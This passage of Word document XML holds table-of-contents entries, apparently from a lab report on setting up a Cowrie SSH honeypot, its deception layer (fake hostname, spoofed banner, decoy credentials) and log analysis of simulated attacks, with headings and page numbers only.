          <w:hyperlink w:anchor="_Toc231686549" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 7 — Redirect Port 22 to Cowrie's Port 2222</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686549 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7CB58852" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686550" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 8 — Start Cowrie</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686550 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B3BB5E3" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686551" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 9 — Confirm Cowrie is Listening</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686551 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CBDA84C" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686552" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 10 — Enable Cowrie Auto-Start on Reboot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686552 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32EE357D" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686553" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 11 — Audit Legacy Firewall Rules</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686553 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7786D9FE" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686554" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 12 — Simulate an Attack from Kali to Generate Log Data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686554 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B65E076" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686555" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2  Setup Confirmation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686555 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E60B3A8" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686556" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3  Deployment Observations &amp; Analysis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686556 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3ED914FD" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686557" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. Deception Layer Configuration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686557 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="29070966" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686558" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1  Step-by-Step Deception Configuration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686558 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E005F94" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686559" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 1 — Configure Realistic Hostname</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686559 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F5F7C38" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686560" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 2 — Spoof the SSH Version Banner</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686560 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D2D46CF" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686561" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 3 — Add Fake Login Credentials</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686561 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D026490" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686562" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 4 — Plant Fake Credential Files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686562 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FD8E1B2" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686563" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 5 — Restart Cowrie to Apply Changes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686563 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E574D64" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686564" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2  Deception Configuration Record</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686564 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7640EC76" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686565" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3  Deception Layer Observations &amp; Analysis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686565 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33BC63E1" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686566" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4. Attack Capture &amp; TTP Collection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686566 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D506FB3" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686567" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1  Cowrie Log File Structure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686567 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71DA125F" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686568" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2  Log Analysis Commands</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686568 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55FFB960" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686569" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3  Attacker Activity Log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
